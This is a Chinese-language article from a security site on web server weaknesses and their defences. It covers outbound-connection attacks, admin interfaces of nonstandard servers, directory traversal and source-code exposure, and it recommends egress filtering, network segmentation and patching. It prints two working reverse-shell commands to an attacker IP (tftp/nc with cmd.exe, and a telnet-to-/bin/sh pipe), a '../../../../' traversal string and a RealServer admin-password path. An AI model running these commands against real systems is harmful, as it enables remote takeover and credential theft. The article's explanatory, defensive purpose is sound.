网页服务器安全漏洞分析及防范措施_安全漏洞聚焦_黑客防线网安服务器维护基地--Powered by WWW.RONGSEN.COM.CN

网页服务器安全漏洞分析及防范措施

作者:黑客防线网安网站维护基地 来源:黑客防线网安网站维护基地 浏览次数:0

本篇关键词:网页服务器安全漏洞
黑客防线网安网讯:虽然现在网上最多的话题就是网络安全的问题,但是值得我们注意到的一件事情就是:许多应该要预防网络安全事项的电子商务应用程序,往往没有花很大心力在处理安全相关事宜上。(这里所提到的网络安全指的是对路由器、

虽然现在网上最多的话题就是网络安全的问题但是值得我们注意到的一件事情就是:许多应该要预防网络安全事项的电子商务应用程序往往没有花很大心力在处理安全相关事宜上(这里所提到的网络安全指的是对路由器、交换器、防火墙与入侵侦测系统等装置所做的预防措施)正是由于这种情况的存在,使得你服务器的资料处于一种半公开的情形,里面的资料就好象放在BBS上一样任人查看。下面我将针对这种情况在这里谈谈网页服务器的设置的问题,一切是否与你相象的一样安全。
    注:本文我从标准服务器(Web servers)和非标准服务器(nonstandard Web servers)两部分来简述。
一、标准服务器(Web servers)的安全漏洞分析及防范措施

    很多电子商务网站是由简单的过滤器或是通过设定只容许 HTTP(Port 80)与 HTTPS(Port 443)两种通讯协议与端口(Port)可以执行,但对由内而外的通讯协议或连结就没有这样多的设定了。事实上,网页应用程序常常需要由内而外的数据传输,可能应用程序需要电子邮件服务器寄信给使用者,或是网站管理员需要通过网络管理应用程序,也会用到由内而外的数据传输。只对由外而内的联机进行过滤是不够的,同样的忽略了由内而外的安全管理也是个坏习惯:黑客还是可以偷偷潜入某个后门,再通过被入侵的机器入侵该网络内任何安全性不严密的机器。如果某个黑客可以强迫信息网服务器开启一个由内而外的联机,这个黑客就可以直接与该服务器互动,并通过此一联机远程遥控。即使此一联机是由内向外开启的,此联机仍然是双向的,意指黑客还是可以通过远程输入指令。想象一下这样一个情况:在你的网络内部有一台应用程序服务器,一边与某个未知的网络位置联机,因为所有的过滤器与防范措施都只针对由外到内,所以这台在网络内的服务器可以联机到同一网络内的其它主机,而不受登录控管清单这种只针对由外到内 Port 80 与 443 作防护的设施。如果这个未知的网络联机是一个恶意入侵的黑客所建立的话,那他可以通过这台应用服务器作为跳板,跳过所有由外到内的防护措施,与在路由器内的机器互动。
对于缺乏安全性控管的服务器,黑客只要进行网服务器上执行某个指令,就能完成以上的攻击。(注:由于本文主要是讨论网页服务器的安全设置及可能存在问题,关于黑客是如何进入服务器执行指令的,我将在以后与大家详说。)

    此外,Microsoft Data Access Components在微软 IIS 4.0 上导致的安全性漏洞可以使黑客通过 HTTP 联机,攻击 IIS 内建的某个组件(Components),藉以取得远程执行某程序的权限。比如对182.17.3.167 这台机器,你只要修改了 Rain Forest Puppy 的原始程序,并执行下面的程序:
tftp -i 182.17.3.167 GET nc.exe&&nc -e cmd.exe 182.17.3.167 53
在 182.17.3.167 这台机器上通过 TFTP(Trivial File Transfer Protocal)执行而取得的Netcat其实是个伪装的指令档案。执行完指令的前半部之后,黑客接下来命令系统用 nc.exe 这个程序执行 cmd.exe(其实就是command mode 或 dos 窗口)并通过 Port 53 与 182.17.3.167 这个位置连接。很显然的,这个网络位置就是黑客所在的位置或是黑客用以作为跳板的机器。在此同时,有一套NetCat 用于接收由被骇侵端的 Port 53 传来的连接,并让黑客取得在远程执行程序的权限,与远程的网页服务器连结。这个安全性问题是个典型的黑客从“Outbound connection”的连结取得执行指令的权限,进而要求网页服务器执行某个指令并导致安全问题的例子。
此外,由于系统本身设计上的特性,让 Unix 也很容易受到上面方式的入侵。目前大部分的 Unix 系统都内建类似微软窗口的 X Window 图形化接口,而 X Window 的设定文件由于是纯文字、又并未编码,这便成为了黑客入侵的有利条件,xterm 这个 x window 程序就是其中的一个例子,xterm 会激活一个图形化的接口,并执行 Unix 上面的系统 shell(command shell),再将执行的结果传送到 X Window 的显示画面上。黑客可以激活 xterm 程序,并将画面与结果传送到黑客的机器上,藉以远程执行程序。
要解决 X Window 的问题,通常是把作为服务器系统中的 X Window 移除掉,因为服务器主要的功能是递送网页,并不需要在本机执行 X Window 这类的图形化系统。不过这样的处置方法还是无法断绝黑客通过由内向外的方式攻击主机,因为 Unix 上面的远程登录(Telnet)系统也可以作为攻击的目标。你可以想像一下下面这种情况:黑客在 182.17.3.167 这台机器上执行两个Netcat程序,一个只容许由 Port 25 联机,另一个是由Port 53 联机,选择这两个 Port 的原因是因为一般路由器设定都会把 Port 25 作为传递电子邮件(SMTP)的预设埠,而将 Port 53 作为 DNS 的预设埠。

    如果现在我们在 Unix 系统端执行下面的程序:
telnet 182.17.3.167 25 | /bin/sh | telnet 182.17.3.167 53
这行程序将会建立两个由内到外的联机,分别与刚刚提到在黑客端执行的两个 NetCat 建立连结。请注意第一个远程连接是作为远程 Unix 系统里面的系统 shell - Bourne Shell(通常在系统中的位置是/bin/sh)的标准输入(standard input)使用,意指黑客可以通过这个连结,在自己的计算机输入指令,NetCat 会通过 Port 25 将指令传到被入侵的计算机中执行,而将执行过的结果(Standard Output)通过由 Port 53 传给在黑客端的另一个NetCat,这样黑客就可以通过远程执行程序并取得结果了。当然,黑客还需要能激活由内而外的连结,以便送出刚刚提到的远程执行档结果,不过很不幸的,有很多方法可以在远程主机上执行一个简单的字符串。
那么我们可以采取那么如防范措施呢?
要保护网页服务器,您必须要重新思考周密的系统安全与防护范围,即使是高流量的环境与需要同时服务大量使用者的网络应用程序,只要你按以下几个步骤实施就可以大大的增强系统安全。

(1)禁止同一台机器同时支持“由外向内”和“由内向外”的连接
首先,不要让向外传递资料的主机也能由外向内连接,即使黑客可以取得并建立某网页服务器的远程程序执行权限,这个原则能让黑客无法拿这台服务器当作联外的跳板。对目前市面上极为普遍的思科路由器来说,可以通过简单的一行规则让由内而外的连接仅限于内部网络 IP,让只有网域内部的计算机可以互相连接。

(2)区隔网段
对某些需要向外发送讯息的应用程序(如发送电子邮件)环境来说,要禁止所有由内而外连结是不可能的,这时候对网络作网段区隔可以将可能的风险减到最低,向外发送讯息的机器可以与服务由外向内的机器放在不同的网段,通过路由器,或防火墙的设定将向外与向内的服务器分开,以降低风险。

(3)在应用程序层就开始注重安全管理
当您的网络应用程序无可避免的要由内而外连结时,可以试着搭配需要验证的快取服务器(Proxy Server),让每次要由内而外连结时,都要通过快取服务器这端,如果程序有正确的身分验证,才允许由内而外的连结。只有快取服务器本身可以直接连结内外网络,其它的连结都需要验证,这样可以确保只有正确的应用程序可以执行由内向外的连结。

(4)记录网络流量的所有动态
最后,请善用网络流量记录(Logging)功能,这条规则指的是将所有向外传送资料的网络联机内容记录到另一部服务器上(syslog server,为了网络的安全)。你应该把任何试图向外传送资料的网络连结都视为非法,并且立刻追查这些资料。

二、非标准网页服务器的安全漏洞分析及防范措施

    目前很多系统管理者在认识上有这么一个误区:保护的网页服务器,就是那些互联网主机!但是事实并非如此!传统上网页服务器是被用来当作网站主机用,以传播信息或者存取资料。然而,当超文件传输协议(HTTP)越来越受到欢迎之时,网络应用软件也逐渐受到欢迎,而我所说的非标准网页服务器专为很多一般常见的应用软件以及设备而存在的。虽然非标准网页服务器虽然只提供有限的功能,但是它们仍旧会为你的网络带来极大的危险。这些网页服务器所引起的相关网络安全问题,可以被归纳为两个基本的类别: 以特定的方式从网页接口衍生出来的安全问题;网页服务器程序错误。

1、管理性接口存在的安全问题

目前常见的非标准网页服务器管理性接口有以下几种:
(1)Compaq Insight Manager,TCP port 2301
注:在 Compaq 硬件平台上作业的网页伺服软件,主要应用在服务器,工作站以及客户端上做系统管理。
(2)Netscape Server Administration Console,TCP port 10000
注:用来做远程设定 Netscape 的网页服务器的管理程序接口 。
(3)Cisco Router Web Interface,TCP port 80
注:用于与路由器做交互式存取的管理程序接口 。
(4)HP JetAdmin,TCP port 8000
注:提供网络外围设备,像是打印机等,远程管理与最佳化的程序接口 。
(5)ScreamingMedia SiteWare,TCP port 30001
注:SiteWare 文件内容管理产品的管理程序接口 。
(6)RealServer Administration,TCP port 27556
注:RealServer 的管理程序接口 。

    管理性接口存在的安全问题最主要的集中在“未经授权的某人会使用网页服务器的功能”这一方面。例如,如果有一个 Cisco 路由器允许经由 HTTP 接口做远程管理,那么未经授权的访客就可能会以不正当的方式更改这个路由器的设定。让恶意的使用者取得管理性的网页接口以及管理者的权限,其结果对你的网络所可能造成的伤害,跟在我在上面提到标准网页服务器的安全漏洞所造成的伤害是一样的。一旦在你的网络里占据的小小的据点,任何技巧平庸的黑客都可以扩大他的网络权限以及存取范围。比如:在打通后门之后,入侵者就可以通过象rootkit 这样的程序在你系统中所动的各种手脚。典型的用在 Unix 系统的 rootkit 取代原先的某些程序,像是取代 ps,而隐藏某些系统 process,取代 netstat,而隐藏某些网络连结,取代 ls 而隐藏某些档案,以及其它工具程序,像是 packet sniffer来监视网络信息(尤其是密码)。这个 rootkit 甚至可以删除任何会露出马脚的系统日志档案(log files)。而他人要做到以上的这一切,并不具有很高深的 Unix 技巧。令人担心的是,目前一个未经授权的人从大多数非标准的网页服务器上取得网络管理性的存取权,并没有多少困难。几乎所有的非标准网页服务器都使用 HTTP 通信协议,而非HTTPS。这表示所有在网络上流通的信息,包含使用者帐号以及密码,通通都以纯文字的型式传送。如果一个合法的管理者曾经使用过这些管理性的网页接口,任何正在这个共享网络上窃听的入侵者都可以取得他的用户帐号以及密码。

2、网页服务器程序错误

此外网页服务器程序错误是另一个引发安全问题的因素。在非标准的网页服务器上,所看到最普遍的是程序错误,像Apache, Microsoft IIS,以及 Netscape Server 都会有明显的安全漏洞存在。而这些程序错误在网页服务器上所引发的安全漏洞有二个:目录跨越的漏洞(directory traversal vulnerabilities),以及原始码曝光的漏洞。

目录跨越的漏洞,让网页服务器的网络用户可以跨过所局限的网页根目录之外读取档案。如果这个漏洞存在的话,任何使用网页浏览器的人都可以观看系统上任何档案及目录。这表示,他们可以破解密码,读取敏感性数据,计算出网页根目录的具体位置等等。利用这些弱点就像在浏览器的 URL 窗口加入以下字符串一样容易 ../../../../。

原始码曝光漏洞同样容易被利用。原始码曝光的程序错误会使得存于网页原始码的敏感性信息被揭露出来。黑客只需要使用网页浏览器的「检看原代码」功能,就可以了。有些非标准的网页服务器会把密码存在内建的位置,诸如 /admin 目录。有经验的黑客很容易进入这些目录,再加上检视原始码功能,就会造成对你造成损失。RealServer 的管理接口就是这项弱点的一个范例。借着存取 http://unknown server:27556/admin/Docs/default.cfg, 使用者可以看到管理权限的密码。一旦他们取得了这个密码,更进一步的安全问题就会出现。

3、如何防范:

要避免未经授权的使用者利用你的非标准网页服务器,你必须采取以下的步骤。

(1)辨认出你的网页服务器。首先使用传输埠扫描仪辨认出所有你挂在网际网络上的主机,或者其它重要的主机系统的对外开放的传输埠(open ports)。 在找出这些开放的传输埠后,通过使用网页浏览器或者使用 Netcat连结,以决定它是不是网页服务器用的传输埠。如果你收到任何 HTTP 错误码,像是 404,或者你看到一个网页,那表示你找到了网页服务器的通讯端口。

(2)控制指向网页服务器的网络存取。网络安全设备像是封包过滤路由器,或防火墙应该都可以避免任何外部连结连到非标准的网页服务器上。

(3)关掉不使用的网页接口。任何开着的收听服务程序,都是潜在的黑客攻击目标。

(4)建立严密的用户帐号、密码的控制存取机制。如果你必须存取一个应用软件,那么就选一个很难猜中的帐号以及密码。当然,如果网页服务器是通过 HTTP 通讯协议而且密码是以纯文字的格式传送,那么我们建议你还是不要用网页接口。

(5)把程序升级到最新版本。程序错误通常很快就被厂商修改过来了,如果你使用网页接口,请先确定你使用的是最新版。从目前的情况来看,很多明显的网络安全缺失都是来自非标准的网页服务器,而且很多安全漏洞都已经通过这些网页服务器公告出来了。你可以到网络安全网站上比如www.hcker.com.cn根据其提供的安全漏洞信息数据库以确定你所使用的非标准网页服务器没有相关的安全漏洞。
 

    黑客防线网安服务器维护方案本篇连接:http://www.rongsen.com.cn/show-4766-1.html
网站维护教程更新时间:2011-02-17 21:59:20  【打印此页】  【关闭
我要申请本站N点 | 黑客防线官网 |  
专业服务器维护及网站维护手工安全搭建环境,网站安全加固服务。黑客防线网安服务器维护基地招商进行中!QQ:29769479

footer  footer  footer  footer